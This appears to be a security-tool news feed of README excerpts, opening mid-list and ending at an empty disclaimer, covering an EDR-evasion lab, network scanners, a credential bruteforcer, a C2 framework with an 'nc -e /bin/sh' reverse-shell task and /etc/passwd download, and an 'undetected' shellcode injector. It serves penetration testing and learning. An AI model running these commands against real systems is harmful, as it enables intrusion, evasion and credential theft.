β”‚   β”‚   β”œβ”€β”€ m
β”‚   β”‚   β”œβ”€β”€ n
β”‚   β”‚   β”œβ”€β”€ o
β”‚   β”‚   β”œβ”€β”€ p
β”‚   β”‚   β”œβ”€β”€ q
β”‚   β”‚   β”œβ”€β”€ r
β”‚   β”‚   β”œβ”€β”€ s
β”‚   β”‚   β”œβ”€β”€ symbols
β”‚   β”‚   β”œβ”€β”€ t

At this point, you can import all those files with the create_db command:

The importer takes a long time; for that reason, we recommend running it with patience.

Next Steps

We are integrating other public sites and applications that may offer information about leaked credentials. We may not be able to see the plaintext password, but it will give insight into whether the user has any compromised credentials:

  • Integration with Have I Been Pwned?
  • Integration with Firefox Monitor
  • Integration with Leak Check
  • Integration with BreachAlarm

Also, we will be focusing on gathering even more information about every employee from public sources. Do you have any ideas in mind? Don't hesitate to reach out to us:

Or you can DM @pastacls or @gaaabifranco on Twitter.



BestEdrOfTheMarket - Little AV/EDR Bypassing Lab For Training And Learning Purposes

By: Zion3R


Little AV/EDR Evasion Lab for training & learning purposes. (under construction)

 ____            _     _____ ____  ____     ___   __   _____ _
| __ ) ___ ___| |_ | ____| _ \| _ \ / _ \ / _| |_ _| |__ ___
| _ \ / _ \/ __| __| | _| | | | | |_) | | | | | |_ | | | '_ \ / _ \
| |_) | __/\__ \ |_ | |___| |_| | _ < | |_| | _| | | | | | | __/
|____/_\___||___/\__| |_____|____/|_| \_\ \___/|_| |_| |_| |_|\___|
| \/ | __ _ _ __| | _____| |_
| |\/| |/ _` | '__| |/ / _ \ __|
| | | | (_| | | | < __/ |_ Yazidou - github.com/Xacone
|_| |_|\__,_|_| |_|\_\___|\__|


BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) project, designed to serve as a testing ground for understanding and bypassing the user-mode detection methods frequently used by these security solutions. These techniques are mainly based on dynamic analysis of the target process state (memory, API calls, etc.).

Feel free to check this short article I wrote that describes the interception and analysis methods implemented by the EDR.


Defensive Techniques

In progress:


Usage

        Usage: BestEdrOfTheMarket.exe [args]

/help Shows this help message and quit
/v Verbosity
/iat IAT hooking
/stack Threads call stack monitoring
/nt Inline Nt-level hooking
/k32 Inline Kernel32/Kernelbase hooking
/ssn SSN crushing
BestEdrOfTheMarket.exe /stack /v /k32
BestEdrOfTheMarket.exe /stack /nt
BestEdrOfTheMarket.exe /iat


MacMaster - MAC Address Changer

By: Zion3R


MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.

Features

  • Custom MAC Address: Set a specific MAC address to your network interface.
  • Random MAC Address: Generate and set a random MAC address.
  • Reset to Original: Reset the MAC address to its original hardware value.
  • Custom OUI: Set a custom Organizationally Unique Identifier (OUI) for the MAC address.
  • Version Information: Easily check the version of MacMaster you are using.

Installation

MacMaster requires Python 3.6 or later.

  1. Clone the repository:
    $ git clone https://github.com/HalilDeniz/MacMaster.git
  2. Navigate to the cloned directory:
    cd MacMaster
  3. Install the package:
    $ python setup.py install

Usage

$ macmaster --help         
usage: macmaster [-h] [--interface INTERFACE] [--version]
[--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]

MacMaster: Mac Address Changer

options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Network interface to change MAC address
--version, -V Show the version of the program
--random, -r Set a random MAC address
--newmac NEWMAC, -nm NEWMAC
Set a specific MAC address
--customoui CUSTOMOUI, -co CUSTOMOUI
Set a custom OUI for the MAC address
--reset, -rs Reset MAC address to the original value

Arguments

  • --interface, -i: Specify the network interface.
  • --random, -r: Set a random MAC address.
  • --newmac, -nm: Set a specific MAC address.
  • --customoui, -co: Set a custom OUI for the MAC address.
  • --reset, -rs: Reset MAC address to the original value.
  • --version, -V: Show the version of the program.
Examples:

  1. Set a specific MAC address:
    $ macmaster.py -i eth0 -nm 00:11:22:33:44:55
  2. Set a random MAC address:
    $ macmaster.py -i eth0 -r
  3. Reset MAC address to its original value:
    $ macmaster.py -i eth0 -rs
  4. Set a custom OUI:
    $ macmaster.py -i eth0 -co 08:00:27
  5. Show program version:
    $ macmaster.py -V

Replace eth0 with your desired network interface.

Note

You must run this script as root or use sudo to run this script for it to work properly. This is because changing a MAC address requires root privileges.
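For reference, on Linux a MAC change usually boils down to an ip link sequence; here is a minimal Python sketch of that idea (illustrative only, not MacMaster's actual implementation; eth0 and the address are placeholders):

import subprocess

def set_mac(interface, mac):
    # bring the link down, rewrite the hardware address, bring it back up
    subprocess.run(["ip", "link", "set", "dev", interface, "down"], check=True)
    subprocess.run(["ip", "link", "set", "dev", interface, "address", mac], check=True)
    subprocess.run(["ip", "link", "set", "dev", interface, "up"], check=True)

set_mac("eth0", "00:11:22:33:44:55")  # requires root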

Contributing

Contributions are welcome! To contribute to MacMaster, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

For any inquiries or further information, you can reach me through the following channels:

Contact



NetProbe - Network Probe

By: Zion3R


NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
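Conceptually, such an ARP sweep can be sketched in a few lines of Scapy (illustrative only, not NetProbe's actual code):

from scapy.all import ARP, Ether, srp

def arp_scan(subnet, iface=None, timeout=2):
    # broadcast an ARP who-has for every address in the subnet and collect the replies
    answered, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=subnet),
                      iface=iface, timeout=timeout, verbose=False)
    return [(r.psrc, r.hwsrc) for _, r in answered]

for ip, mac in arp_scan("192.168.1.0/24"):
    print(ip, mac)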

Features

  • Scan for devices on a specified IP address or subnet
  • Display the IP address, MAC address, manufacturer, and device model of discovered devices
  • Live tracking of devices (optional)
  • Save scan results to a file (optional)
  • Filter by manufacturer (e.g., 'Apple') (optional)
  • Filter by IP range (e.g., '192.168.1.0/24') (optional)
  • Scan rate in seconds (default: 5) (optional)

Download

You can download the program from the GitHub page.

$ git clone https://github.com/HalilDeniz/NetProbe.git

Installation

To install the required libraries, run the following command:

$ pip install -r requirements.txt

Usage

To run the program, use the following command:

$ python3 netprobe.py [-h] -t  [...] -i  [...] [-l] [-o] [-m] [-r] [-s]
  • -h,--help: show this help message and exit
  • -t,--target: Target IP address or subnet (default: 192.168.1.0/24)
  • -i,--interface: Interface to use (default: None)
  • -l,--live: Enable live tracking of devices
  • -o,--output: Output file to save the results
  • -m,--manufacturer: Filter by manufacturer (e.g., 'Apple')
  • -r,--ip-range: Filter by IP range (e.g., '192.168.1.0/24')
  • -s,--scan-rate: Scan rate in seconds (default: 5)

Example:

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

Help Menu

$ python3 netprobe.py --help                      
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]

NetProbe: Network Scanner Tool

options:
-h, --help show this help message and exit
-t [ ...], --target [ ...]
Target IP address or subnet (default: 192.168.1.0/24)
-i [ ...], --interface [ ...]
Interface to use (default: None)
-l, --live Enable live tracking of devices
-o , --output Output file to save the results
-m , --manufacturer Filter by manufacturer (e.g., 'Apple')
-r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
-s , --scan-rate Scan rate in seconds (default: 5)

Default Scan

$ python3 netprobe.py 

Live Tracking

You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l

Save Results

You can save the scan results to a file by using the -o or --output flag followed by the desired output file name.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
┏━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ IP Address   ┃ MAC Address       ┃ Packet Size ┃ Manufacturer                 ┃
┑━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 192.168.1.1  β”‚ **:6e:**:97:**:28 β”‚ 102         β”‚ ASUSTek COMPUTER INC.        β”‚
β”‚ 192.168.1.3  β”‚ 00:**:22:**:12:** β”‚ 102         β”‚ InPro Comm                   β”‚
β”‚ 192.168.1.2  β”‚ **:32:**:bf:**:00 β”‚ 102         β”‚ Xiaomi Communications Co Ltd β”‚
β”‚ 192.168.1.98 β”‚ d4:**:64:**:5c:** β”‚ 102         β”‚ ASUSTek COMPUTER INC.        β”‚
β”‚ 192.168.1.25 β”‚ **:49:**:00:**:38 β”‚ 102         β”‚ Unknown                      β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Contact

If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:

License

This program is released under the MIT LICENSE. See LICENSE for more information.



CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

By: Zion3R


CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.


Key Features:

  • Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.

  • Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.

  • Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.

  • Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.

With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.
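The core idea behind the subdomain technique is simple: look for DNS names that resolve straight to the origin server instead of a Cloudflare edge. A minimal sketch (the candidate names are hypothetical; the tool uses its own wordlist and additional checks):

import socket

CANDIDATES = ["mail", "ftp", "cpanel", "webmail", "direct", "dev"]  # hypothetical list

def candidate_ips(domain):
    for sub in CANDIDATES:
        host = f"{sub}.{domain}"
        try:
            print(host, "->", socket.gethostbyname(host))
        except socket.gaierror:
            continue  # name does not resolve

candidate_ips("example.com")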

Limitation

- Still in the development phase; sometimes it can't detect the real IP.

- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.

1. False Negatives: CloakQuest3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.

2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.

3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare.

This tool is a Proof of Concept and is for Educational Purposes Only.

How to Use:

  1. Run CloudScan with a single command-line argument: the target domain you want to analyze.

     git clone https://github.com/spyboy-productions/CloakQuest3r.git
    cd CloakQuest3r
    pip3 install -r requirements.txt
    python cloakquest3r.py example.com
  2. The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.

  3. If Cloudflare is detected, CloudScan will scan for subdomains and identify their real IP addresses.

  4. You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.

  5. Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.

CloudScan simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.

Run It Online:

Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r



Kali Linux 2023.4 - Penetration Testing and Ethical Hacking Linux Distribution

By: Zion3R

Time for another Kali Linux release! – Kali Linux 2023.4. This release has various impressive updates.


The summary of the changelog since the 2023.3 release from August is:

Mass-Bruter - Mass Bruteforce Network Protocols

By: Zion3R


Mass bruteforce network protocols

Info

Simple personal script to quickly mass-bruteforce common services across a large network segment.
It will check for default credentials on FTP, SSH, MySQL, MSSQL, etc.
This was made for authorized red team penetration testing purposes only.


How it works

  1. Use masscan (faster than nmap) to find alive hosts with common ports from the network segment.
  2. Parse ips and ports from masscan result.
  3. Craft and run hydra commands to automatically bruteforce supported network services on devices.
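Step 2 is essentially a regex pass over masscan's "Discovered open port" lines; a minimal parsing sketch (not the script's actual code):

import re

LINE = re.compile(r"Discovered open port (\d+)/(?:tcp|udp) on ([\d.]+)")

def parse_masscan(path):
    # yield (ip, port) pairs from a saved masscan run
    with open(path) as fh:
        for line in fh:
            m = LINE.search(line)
            if m:
                yield m.group(2), int(m.group(1))

for ip, port in parse_masscan("./result/masscan/masscan_test.txt"):
    print(ip, port)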

Requirements

  • Kali linux or any preferred linux distribution
  • Python 3.10+
# Clone the repo
git clone https://github.com/opabravo/mass-bruter
cd mass-bruter

# Install required tools for the script
apt update && apt install seclists masscan hydra

How To Use

Private IP ranges: 10.0.0.0/8, 192.168.0.0/16, 172.16.0.0/12

Save masscan results under ./result/masscan/, with the format masscan_<name>.<ext>

Ex: masscan_192.168.0.0-16.txt

Example command:

masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt

Example Resume Command:

masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt

Command Options

β”Œβ”€β”€(rootγ‰Ώroot)-[~/mass-bruter]
└─# python3 mass_bruteforce.py
Usage: [OPTIONS]

Mass Bruteforce Script

Options:
-q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
mssql, postgres, oracle)
-a, --all Brute all services(Very Slow)
-s, --show Show result with successful login
-f, --file-path PATH The directory or file that contains masscan result
[default: ./result/masscan/]
--help Show this message and exit.

Quick Bruteforce Example:

python3 mass_bruteforce.py -q -f ~/masscan_script.txt

Fetch cracked credentials:

python3 mass_bruteforce.py -s

Todo

  • Migrate with dpl4hydra
  • Optimize the code and functions
  • MultiProcessing

Any contributions are welcomed!



Forbidden-Buster - A Tool Designed To Automate Various Techniques In Order To Bypass HTTP 401 And 403 Response Codes And Gain Access To Unauthorized Areas In The System

By: Zion3R


Forbidden Buster is a tool designed to automate various techniques in order to bypass HTTP 401 and 403 response codes and gain access to unauthorized areas in the system. This code is made for security enthusiasts and professionals only. Use it at your own risk.

  • Probes HTTP 401 and 403 response codes to discover potential bypass techniques.
  • Utilizes various methods and headers to test and bypass access controls.
  • Customizable through command-line arguments.

Install requirements

pip3 install -r requirements.txt

Run the script

python3 forbidden_buster.py -u http://example.com

Forbidden Buster accepts the following arguments:

  -h, --help            show this help message and exit
-u URL, --url URL Full path to be used
-m METHOD, --method METHOD
Method to be used. Default is GET
-H HEADER, --header HEADER
Add a custom header
-d DATA, --data DATA Add data to requset body. JSON is supported with escaping
-p PROXY, --proxy PROXY
Use Proxy
--rate-limit RATE_LIMIT
Rate limit (calls per second)
--include-unicode Include Unicode fuzzing (stressful)
--include-user-agent Include User-Agent fuzzing (stressful)

Example Usage:

python3 forbidden_buster.py --url "http://example.com/secret" --method POST --header "Authorization: Bearer XXX" --data '{\"key\":\"value\"}' --proxy "http://proxy.example.com" --rate-limit 5 --include-unicode --include-user-agent

  • Hacktricks - Special thanks for providing valuable techniques and insights used in this tool.
  • SecLists - Credit to danielmiessler's SecLists for providing the wordlists.
  • kaimi - Credit to kaimi's "Possible IP Bypass HTTP Headers" wordlist.


PathFinder - Tool That Provides Information About A Website

By: Zion3R


Web Path Finder is a Python program that provides information about a website. It retrieves various details such as page title, last updated date, DNS information, subdomains, firewall names, technologies used, certificate information, and more.


  • Retrieve important information about a website
  • Gain insights into the technologies used by a website
  • Identify subdomains and DNS information
  • Check firewall names and certificate details
  • Perform bypass operations for captcha and JavaScript content

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/PathFinder.git
  2. Install the required packages:

    pip install -r requirements.txt

This will install all the required modules and their respective versions.

Run the program using the following command:

β”Œβ”€β”€(root💀denizhalil)-[~/MyProjects/]
└─# python3 web-info-explorer.py --help
usage: wpathFinder.py [-h] url

Web Information Program

positional arguments:
url Enter the site URL

options:
-h, --help show this help message and exit

Replace <url> with the URL of the website you want to explore.

Here is an example output of running the program:

β”Œβ”€β”€(root💀denizhalil)-[~/MyProjects/]
└─# python3 pathFinder.py https://www.facebook.com/
Site Information:
Title: Facebook - Login or Register
Last Updated Date: None
First Creation Date: 1997-03-29 05:00:00
Dns Information: []
Sub Branches: ['157']
Firewall Names: []
Technologies Used: javascript, php, css, html, react
Certificate Information:
Certificate Issuer: US
Certificate Start Date: 2023-02-07 00:00:00
Certificate Expiration Date: 2023-05-08 23:59:59
Certificate Validity Period (Days): 90
Bypassed JavaScript content:
</ div>

Contributions are welcome! To contribute to PathFinder, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

  • Thank you my friend Varol

This project is licensed under the MIT License - see the LICENSE file for details.

For any inquiries or further information, you can reach me through the following channels:



Commander - A Command And Control (C2) Server

By: Zion3R


Commander is a command and control framework (C2) written in Python, Flask and SQLite. It comes with two agents written in Python and C.

Under Continuous Development

Not script-kiddie friendly


Features

  • Fully encrypted communication (TLS)
  • Multiple Agents
  • Obfuscation
  • Interactive Sessions
  • Scalable
  • Base64 data encoding
  • RESTful API

Agents

  • Python 3
    • The python agent supports:
      • sessions, an interactive shell between the admin and the agent (like ssh)
      • obfuscation
      • Both Windows and Linux systems
      • download/upload files functionality
  • C
    • The C agent supports only the basic functionality for now, the control of tasks for the agents
    • Only for Linux systems

Requirements

Python >= 3.6 is required to run it, along with the following dependencies.

Linux for admin.py and c2_server.py (untested on Windows).
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt

How to Use it

First create the required certs and keys

# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

Start the admin.py module first in order to create a local sqlite db file

python3 admin.py

Continue by running the server

python3 c2_server.py

And last, the agent. The Python agent can just be run, but the C agent needs to be compiled first.

# python agent
python3 agent.py

# C agent
gcc agent.c -o agent -lcurl -lb64
./agent

By default both the agents and the server run over TLS and base64. The communication endpoint is set to 127.0.0.1:5000; if a different endpoint is needed, it should be changed in the agents' source files.

As the Operator/Administrator you can use the following commands to control your agents

Commands:

task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes an shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.

task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays info for all the availiable agents or for specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.

exit
Bye Bye!


Sessions:

sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start' , 'stop' 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the availiable sessions
local-ls directory
Lists on your host the files on the selected directory
download 'file'
Downloads the 'file' locally on the current directory
upload 'file'
Uploads a file in the directory where the agent currently is

Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary, but it is not, at least that is what I believe :P

The idea behind this functionality is that the c2 server can request an agent to re-register in case it doesn't recognize it. So, since we want to clear the db of unused old entries and at the same time find all the currently active hosts, we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.

Flows

Below you can find a normal flow diagram

Normal Flow

In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.

More specifically, if we lose the database we will not have any information about the uuids that we are receiving, thus we can't set tasks on them. So, the agents will keep trying to retrieve their tasks, and since we don't recognize them we will ask them to register again so that we can insert them into our database and control them again.

Below is the flow diagram for this case.

Re-register Flow

Useful examples

To set up your environment, start admin.py first, then c2_server.py, and then run the agent. Afterwards you can check the available agents.

# show all availiable agents
show agent all

To instruct all the agents to run the command "id" you can do it like this:
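# instruct every agent to execute "id" (using the task grammar documented above)
task add all c2-shell id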

To check the history/previous results of executed tasks for a specific agent, do it like this:
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241

You can also change the interval of the agents that checks for tasks to 30 seconds like this:

# to set it for all agents
task add all c2-sleep 30

To open a session with one or more of your agents do the following.

# find the agent/uuid
show agent all

# enable the server to accept connections
sessions server start 5555

# add a task for a session to your prefered agent
task add your_prefered_agent_uuid_here c2-session 5555

# display a list of available connections
sessions list

# select to attach to one of the sessions, lets select 0
sessions select 0

# run a command
id

# download the passwd file locally
download /etc/passwd

# list your files locally to check that passwd was created
local-ls

# upload a file (test.txt) in the directory where the agent is
upload test.txt

# return to the main cli
go back

# check if the server is running
sessions server status

# stop the sessions server
sessions server stop

If for some reason you want to run another external session, for example with netcat or metasploit, do the following.

# show all availiable agents
show agent all

# first open a netcat on your machine
nc -vnlp 4444

# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

This way you will have a 'die hard' shell: even if you get disconnected, it will come back up immediately. Only the interactive commands will make it die permanently.

Obfuscation

The Python agent offers obfuscation using basic AES-ECB encryption and base64 encoding.

Edit the obfuscator.py file and change the 'key' value to a 16-character key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py
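For reference, the scheme amounts to AES-ECB plus base64; a minimal standalone sketch with PyCryptodome (not the obfuscator.py internals; the key is a placeholder):

import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad

KEY = b"0123456789abcdef"  # placeholder 16-char key

def obfuscate(data):
    return base64.b64encode(AES.new(KEY, AES.MODE_ECB).encrypt(pad(data, AES.block_size)))

def deobfuscate(blob):
    return unpad(AES.new(KEY, AES.MODE_ECB).decrypt(base64.b64decode(blob)), AES.block_size)

print(deobfuscate(obfuscate(b"print('agent')")))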

You can run it like this:

python3 obfuscator.py

# and to run the agent, do as usual
python3 obs_agent.py

Tips & Tricks

  1. The built-in Flask app server can't handle multiple/concurrent requests, so you can use the gunicorn server for better performance, like this:
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key 
  2. Create a binary file for your Python agent like this:
pip install pyinstaller
pyinstaller --onefile agent.py

The binary can be found under the dist directory.

In case something fails you may need to update your python and pip libs. If it continues failing then ..well.. life happened

  3. Create new certs in each engagement

  4. Backup your c2.db, it is easy... just a file

Testing

pytest was used for the testing. You can run the tests like this:

cd tests/
py.test

Be careful: You must run the tests inside the tests directory otherwise your c2.db will be overwritten and you will lose your data

To check the code coverage and produce a nice html report you can use this:

# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html

Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.



HBSQLI - Automated Tool For Testing Header Based Blind SQL Injection

By: Zion3R


HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers, penetration testers & bug bounty hunters to test the security of web applications.


Disclaimer:

This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.

The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.

Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.

By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.

Installation

Install HBSQLI with following steps:

$ git clone https://github.com/SAPT01/HBSQLI.git
$ cd HBSQLI
$ pip3 install -r requirements.txt

Usage/Examples

usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]

options:
-h, --help show this help message and exit
-l LIST, --list LIST To provide list of urls as an input
-u URL, --url URL To provide single url as an input
-p PAYLOADS, --payloads PAYLOADS
To provide payload file having Blind SQL Payloads with delay of 30 sec
-H HEADERS, --headers HEADERS
To provide header file having HTTP Headers which are to be injected
-v, --verbose Run on verbose mode

For Single URL:

$ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v

For List of URLs:

$ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v

Modes

There are basically two modes: verbose, which shows you the whole process and the status of each test performed, and non-verbose, which just prints the vulnerable ones to the screen. To enable verbose mode, just add -v to your command.

Notes

  • You can use the provided payload file or use a custom payload file, just remember that delay in each payload in the payload file should be set to 30 seconds.

  • You can use the provided headers file or even some more custom header in that file itself according to your need.

Demo



RecycledInjector - Native Syscalls Shellcode Injector

By: Zion3R


(Currently) Fully Undetected same-process native/.NET assembly shellcode injector based on RecycledGate by thefLink, which is also based on HellsGate + HalosGate + TartarusGate to ensure undetectable native syscalls even if one technique fails.

To remain stealthy and keep entropy on the final executable low, do ensure that shellcode is always loaded externally since most AV/EDRs won't check for signatures on non-executable or DLL files anyway.

It is important to also note that the fully undetected part refers to the loading of the shellcode; the shellcode itself will still be subject to behavior monitoring, so make sure the loaded executable also makes use of defense evasion techniques (e.g., SharpKatz, which features DInvoke, instead of Mimikatz).


Usage

.\RecycledInjector.exe <path_to_shellcode_file>

Proof of Concept

This proof of concept leverages Terminator by ZeroMemoryEx to kill most security solution/agents present on the system. It is used against Microsoft Defender for Endpoint EDR.

On the left we inject the Terminator shellcode to load the vulnerable driver and kill MDE processes, and on the right is an example of loading and executing Invoke-Mimikatz remotely from memory, which is not stopped as there is no running security solution anymore on the system.



Spoofy - Program That Checks If A List Of Domains Can Be Spoofed Based On SPF And DMARC Records

By: Zion3R



Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"

Well, Spoofy is different and here is why:

  1. Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
  2. Accurate bulk lookups
  3. Custom, manually tested spoof logic (No guessing or speculating, real world test results)
  4. SPF lookup counter

Β 

HOW TO USE

Spoofy requires Python 3+. Python 2 is not supported. Usage is shown below:

Usage:
./spoofy.py -d [DOMAIN] -o [stdout or xls]
OR
./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]

Install Dependencies:
pip3 install -r requirements.txt

HOW DO YOU KNOW ITS SPOOFABLE

The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers. Download here.
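Checks like these start from the domain's SPF and DMARC TXT records; a minimal lookup sketch with dnspython (illustrative only, not Spoofy's resolver logic):

import dns.resolver

def get_record(name, prefix):
    try:
        for rr in dns.resolver.resolve(name, "TXT"):
            txt = b"".join(rr.strings).decode()
            if txt.lower().startswith(prefix):
                return txt
    except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN):
        pass
    return None

domain = "example.com"
print("SPF:  ", get_record(domain, "v=spf1"))
print("DMARC:", get_record(f"_dmarc.{domain}", "v=dmarc1"))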

METHODOLOGY

The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.

After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.

DISCLAIMER

